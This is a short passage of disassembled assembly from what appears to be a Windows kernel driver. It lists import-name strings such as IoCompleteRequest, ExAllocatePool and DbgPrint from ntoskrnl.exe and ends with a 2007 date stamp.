s_Createsymboli db 'CreateSymbolicLink',0
align 4
dd 6F49011Bh, 61657243h, 65446574h, 65636976h
dd 1180000h
s_Iocompletereq db 'IoCompleteRequest',0
s_G db 'G',0
s_Exfreepool db 'ExFreePool',0
align 4
s_7 db '7',0
s_Exallocatepoo db 'ExAllocatePool',0
align 2
s_- db '-',0
s_Dbgprint db 'DbgPrint',0
align 2
s_Ntoskrnl_exe db 'ntoskrnl.exe',0
align 10h
INIT ends

end start

2007-9-2 17:20

0